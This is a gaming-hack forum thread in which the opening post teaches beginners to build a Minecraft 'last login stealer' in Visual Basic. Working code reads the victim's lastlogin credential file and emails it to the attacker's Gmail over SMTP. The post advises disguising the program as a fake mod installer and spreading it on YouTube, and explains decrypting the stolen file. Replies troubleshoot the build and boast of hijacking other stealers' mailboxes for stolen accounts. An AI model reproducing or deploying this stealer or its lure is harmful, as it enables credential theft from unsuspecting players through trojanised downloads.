Page 1 of 2 12 LastLast
Results 1 to 15 of 29
  1. #1
    rockpoo's Avatar
    Join Date
    Nov 2012
    Gender
    male
    Location
    Somewhere over the Rainbow
    Posts
    101
    Reputation
    15
    Thanks
    1,371
    My Mood
    Twisted

    Post How to make a Last Login Stealer for Noobs (Visual Basic)

    Hi ppl at mpgh, I have been browsing around and have seen that there hasn't really been a tutoral for a lls so here it is
    This is for educational purposes only.
    Okay, so today I am gonna tell you how to make a last login stealer.

    What you will need.
    A gmail account to sent the files to (prefered)
    Visual Basic (Express 2010 prefered, WILL show where to download in tut)
    Common sense.
    A brain

    First, if you open up run from your start menu and write the following:
    %appdata%/.minecraft/

    You will be taken to the Minecraft file folder. Look for the lastlogin file.

    Now, if you wanted to open this the most normal thing to do is to open it in notepad. But as you can see below, we will just get something like this.
    As we can see, it is crypted.

    Now, in order to decrypt the file there are many Last login decrypters that on on this site. Please find them yourself.


    Unpack it to your desktop or something like that, and drag the lastlogin file into the folder. Now click on start.bat, and it will open cmd and decryt it.

    Now for the coding part.

    First, you need Visual Basic. Personally I prefer Visual Basic 2010 Express, which can be downloaded here.
    Code:
    https://www.microsof*****m/visualstudio/eng/downloads#d-2010-express
    Now open up VB, and press file, and New Project.
    Here you choose Windows Forms Application.
    REMEMBER to change the name of your program!!


    Okay, now first you can change the text in the right corner, and add a button.


    Now, you can change the text as well at the button in the same way we did with the program window.
    Double click the button and you will get a code window up.
    This is the code that controls the button.

    Now we are going to add the code that steals the lastlogin file.
    Mark everything on the page and delete it.
    Add the code from below to the page.
    Code:
    Imports System.Net.Mail
    Public Class Form1
        Dim smtp As New SmtpClient
        Dim mail As New MailMessage
    
    
        Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
    
            Dim MyMailMessage As New MailMessage()
            Try
                Dim Attch As Net.Mail.Attachment = New Net.Mail.Attachment(Environment.GetFolderPath(Environment.SpecialFolder.Applicat​ionData) + "\.minecraft\lastlogin")
                MyMailMessage.Attachments.Add(Attch)
                MyMailMessage.From = New MailAddress("Example@gmail.com")
                MyMailMessage.To.Add("Example@gmail.com")
                MyMailMessage.Subject = ("LastLoginFile")
                MyMailMessage.Body = (" ")
                Dim SMTP As New SmtpClient("smtp.gmail.com")
                SMTP.Port = 587
                SMTP.EnableSsl = True
                SMTP.Credentials = New System.Net.NetworkCredential("Example@gmail.com", "Password")
                SMTP.Send(MyMailMessage)
            Catch ex As Exception
            End Try
        End Sub
    
    End Class
    [I DID NOT WRITE THIS CODE ALL CREDITS GO TO THE ORIGINAL PROGRAMMER]

    Where it says Example@gmail.com, you should change it to your gmail.
    Where it says Password you should enter your gmail password.

    Now, if you have done all of these things right, you should be ready to make a .exe file and start spreading!

    This is done by clicking build in the toolbar at the top, and then click build again. Now it has made a .exe file in the folder where you saved the project.

     
    If you want someone to download and use your program you should change the design. A good idea is to fake a auto mod installer, for x-ray or something like that. Change the background to a Minecraft picture, and the button to say Install or something like that, and post it on youtube.
    Give Me a Thx Or Rep If I Helped You
     

    “Honesty is a very expensive gift, Don't expect it from cheap people.” Warren Buffett
    like a boss
    HALLO
    [img]https://www.danasof*****m/sig/452440.jpg[/img]

     

  2. The Following 4 Users Say Thank You to rockpoo For This Useful Post:

    CodePlaysMC (08-05-2014),mk999kh1 (05-31-2013),Paulius231 (04-26-2014),Vincent Dominguez (12-02-2013)

  3. #2
    TheFlyingDutchman''s Avatar
    Join Date
    Apr 2012
    Gender
    male
    Location
    On my haunted flying pirate ship
    Posts
    3,310
    Reputation
    325
    Thanks
    595
    My Mood
    Psychedelic
    I will try this, seems nice!
    "People don't change.
    Circumstances do."


    "Trying to find succes without working hard is like trying to harvest where you did not sow"















    Bullpop












    Will be my supp in LoL


    You spin me right round right round

  4. #3
    Smaug's Avatar
    Join Date
    Apr 2011
    Gender
    male
    Posts
    2,518
    Reputation
    121
    Thanks
    1,192
    Nice tutorial!
    Member Level 1 since 4/20/11 - 8/4/14
    Member Level 2 since 8/4/14 - present

  5. #4
    awesomeraphi's Avatar
    Join Date
    Jun 2012
    Gender
    male
    Posts
    364
    Reputation
    10
    Thanks
    65
    My Mood
    Sad
    How do i add a Button :O?

    ---------- Post added at 02:35 AM ---------- Previous post was at 02:07 AM ----------

    Hmm i got 2 erorrs when i try to debugg:

    Error 1 Comma, ')', or a valid expression continuation expected. C:\Users\*****\AppData\Local\Temporary Projects\GGG\Form1.vb 11 133 GGG

    Error 2 'Attch' is not declared. It may be inaccessible due to its protection level. C:\Users\*****\AppData\Local\Temporary Projects\GGG\Form1.vb 12 43 GGG

    ---------- Post added at 02:47 AM ---------- Previous post was at 02:35 AM ----------

    ok i think i fixed that but when i debugg now and click on my button "install" i get a new error :

    A first chance exception of type 'System.Net.Mail.SmtpException' occurred in System.dll

    ---------- Post added at 03:39 AM ---------- Previous post was at 02:47 AM ----------

    Oh yeah i watched some youtube videos now it works THX man i LOVE you (no homo)

  6. #5
    TheFlyingDutchman''s Avatar
    Join Date
    Apr 2012
    Gender
    male
    Location
    On my haunted flying pirate ship
    Posts
    3,310
    Reputation
    325
    Thanks
    595
    My Mood
    Psychedelic
    Quote Originally Posted by awesomeraphi View Post
    How do i add a Button :O?

    ---------- Post added at 02:35 AM ---------- Previous post was at 02:07 AM ----------

    Hmm i got 2 erorrs when i try to debugg:

    Error 1 Comma, ')', or a valid expression continuation expected. C:\Users\*****\AppData\Local\Temporary Projects\GGG\Form1.vb 11 133 GGG

    Error 2 'Attch' is not declared. It may be inaccessible due to its protection level. C:\Users\*****\AppData\Local\Temporary Projects\GGG\Form1.vb 12 43 GGG

    ---------- Post added at 02:47 AM ---------- Previous post was at 02:35 AM ----------

    ok i think i fixed that but when i debugg now and click on my button "install" i get a new error :

    A first chance exception of type 'System.Net.Mail.SmtpException' occurred in System.dll

    ---------- Post added at 03:39 AM ---------- Previous post was at 02:47 AM ----------

    Oh yeah i watched some youtube videos now it works THX man i LOVE you (no homo)
    Nice conversation you having there with yourself

    ---------- Post added at 02:10 AM ---------- Previous post was at 01:05 AM ----------

    BTW when I try to build it, I have to go to Debug, and when I press build, nothing happens.
    I changed the folder where it was save in, but I cant find it.
    Any suggestions?
    "People don't change.
    Circumstances do."


    "Trying to find succes without working hard is like trying to harvest where you did not sow"















    Bullpop












    Will be my supp in LoL


    You spin me right round right round

  7. #6
    aimanmuluk's Avatar
    Join Date
    Dec 2012
    Gender
    male
    Location
    MPGH.net
    Posts
    114
    Reputation
    10
    Thanks
    551
    My Mood
    Grumpy
    Not bad, Not bad

    PROUD TO BE MPGH MEMBER.



    PRESS THANKS IF I HELPED YOU.

  8. The Following User Says Thank You to aimanmuluk For This Useful Post:

    BSWTF (04-21-2013)

  9. #7
    OnlyHereForHakes's Avatar
    Join Date
    Mar 2013
    Gender
    male
    Posts
    5
    Reputation
    10
    Thanks
    3
    Just puttin this out there that this method gets your email account hijacked 100% of the time.I've cracked a lot of lls and it takes 2 minutes to get the email.I suggest you actually learn vb before you copy and paste code.

  10. The Following User Says Thank You to OnlyHereForHakes For This Useful Post:

    LordPankake (06-07-2013)

  11. #8
    TheFlyingDutchman''s Avatar
    Join Date
    Apr 2012
    Gender
    male
    Location
    On my haunted flying pirate ship
    Posts
    3,310
    Reputation
    325
    Thanks
    595
    My Mood
    Psychedelic
    Quote Originally Posted by OnlyHereForHakes View Post
    Just puttin this out there that this method gets your email account hijacked 100% of the time.I've cracked a lot of lls and it takes 2 minutes to get the email.I suggest you actually learn vb before you copy and paste code.
    You have to make a second G mail with a pass like 2GVT2UTYGV2389YVRB28YBEFY9VB2E9YVB289YB359VTY2739V THIVB328YVB38R9FVYHB
    Try to hijack that
    "People don't change.
    Circumstances do."


    "Trying to find succes without working hard is like trying to harvest where you did not sow"















    Bullpop












    Will be my supp in LoL


    You spin me right round right round

  12. #9
    TheFlyingDutchman''s Avatar
    Join Date
    Apr 2012
    Gender
    male
    Location
    On my haunted flying pirate ship
    Posts
    3,310
    Reputation
    325
    Thanks
    595
    My Mood
    Psychedelic
    Quote Originally Posted by rockpoo View Post
    clicking build in the toolbar at the top, and then click build again. Now it has made a .exe file in the folder where you saved the project.
    Something when wrong, could you PM me ur skype and explain it to me pls?
    "People don't change.
    Circumstances do."


    "Trying to find succes without working hard is like trying to harvest where you did not sow"















    Bullpop












    Will be my supp in LoL


    You spin me right round right round

  13. #10
    yomattyo's Avatar
    Join Date
    Aug 2012
    Gender
    male
    Posts
    12
    Reputation
    10
    Thanks
    2
    When I Make the Buttons code. I remove everything and paste that code. Then I change the example email and password to my email and password, but then i get a million errors. okay. more like 5. but it makes it so I cant run it. Do I need to download something for the Email to work. Theese are the Errors

    X|2|'Attch' is not declared. it may be inaccessable due to its protection level |line 12|
    X|1|Comma, ')', or a valid expression continuation expected. |line 11|
    X|4|Overload resolution failed because no accessible 'Add' Accepts this number of arguments|line 14|
    X|3|string constants must end with a double quote |line 13|
    X|5|string constants must end with a double quote |line 14|

    Please help!

  14. #11
    LordPankake's Avatar
    Join Date
    Aug 2012
    Gender
    male
    Posts
    1,010
    Reputation
    260
    Thanks
    2,466
    My Mood
    Angry
    Quote Originally Posted by banditodegod View Post
    Quote Originally Posted by OnlyHereForHakes View Post
    Just puttin this out there that this method gets your email account hijacked 100% of the time.I've cracked a lot of lls and it takes 2 minutes to get the email.I suggest you actually learn vb before you copy and paste code.
    You have to make a second G mail with a pass like 2GVT2UTYGV2389YVRB28YBEFY9VB2E9YVB289YB359VTY2739V THIVB328YVB38R9FVYHB
    Try to hijack that
    You don't know what you're talking about. VB is easily decoded. So, due to this, go ahead and make one. I'll download it, decompile it, get in your email, take the alts for myself and delete your account. Worked great when Jyyt posted Kronos's LLS. I got 200+

    Necro'd due to post above me. Still a good tutorial anyways.

  15. #12
    TheFlyingDutchman''s Avatar
    Join Date
    Apr 2012
    Gender
    male
    Location
    On my haunted flying pirate ship
    Posts
    3,310
    Reputation
    325
    Thanks
    595
    My Mood
    Psychedelic
    Quote Originally Posted by LordPankake View Post
    You don't know what you're talking about. VB is easily decoded. So, due to this, go ahead and make one. I'll download it, decompile it, get in your email, take the alts for myself and delete your account. Worked great when Jyyt posted Kronos's LLS. I got 200+

    Necro'd due to post above me. Still a good tutorial anyways.
    I facepalmed myself after I posted it.
    I dunno where my mind was when I typed that, prolly far away from common sense.
    "People don't change.
    Circumstances do."


    "Trying to find succes without working hard is like trying to harvest where you did not sow"















    Bullpop












    Will be my supp in LoL


    You spin me right round right round

  16. #13
    TheSubject_6's Avatar
    Join Date
    Jun 2013
    Gender
    male
    Posts
    0
    Reputation
    10
    Thanks
    0
    HOW AMKE BUTTON AND CGANGE TEXT?

  17. #14
    brammetjeb's Avatar
    Join Date
    Jun 2013
    Gender
    male
    Posts
    18
    Reputation
    10
    Thanks
    11
    outdated, 1.6.1 is out now

  18. #15
    VelocityCobra's Avatar
    Join Date
    Dec 2012
    Gender
    female
    Posts
    29
    Reputation
    10
    Thanks
    1
    It says that the application is missing required files when I try to open it like a normal user would from medi.a.f.ire or drop.box

Page 1 of 2 12 LastLast

Similar Threads

  1. [HELP]How to make game auto login with vb
    By BaZuGa in forum Visual Basic Programming
    Replies: 0
    Last Post: 01-19-2010, 11:55 AM
  2. how to make a select all button for checkboxes
    By ac1d_buRn in forum Visual Basic Programming
    Replies: 5
    Last Post: 10-23-2009, 09:36 PM
  3. [Info] How to make mods,sounds,logins..
    By krishna in forum CrossFire Mods & Rez Modding
    Replies: 3
    Last Post: 09-29-2009, 02:20 PM
  4. How to make hacks last longer
    By sgt_eberhart in forum WarRock - International Hacks
    Replies: 6
    Last Post: 04-08-2009, 08:22 AM
  5. [TuT] How to make PW and value box for Guns/Superjump/SkyStormer(VB6)
    By jokuvaan11 in forum WarRock - International Hacks
    Replies: 14
    Last Post: 06-30-2007, 01:09 PM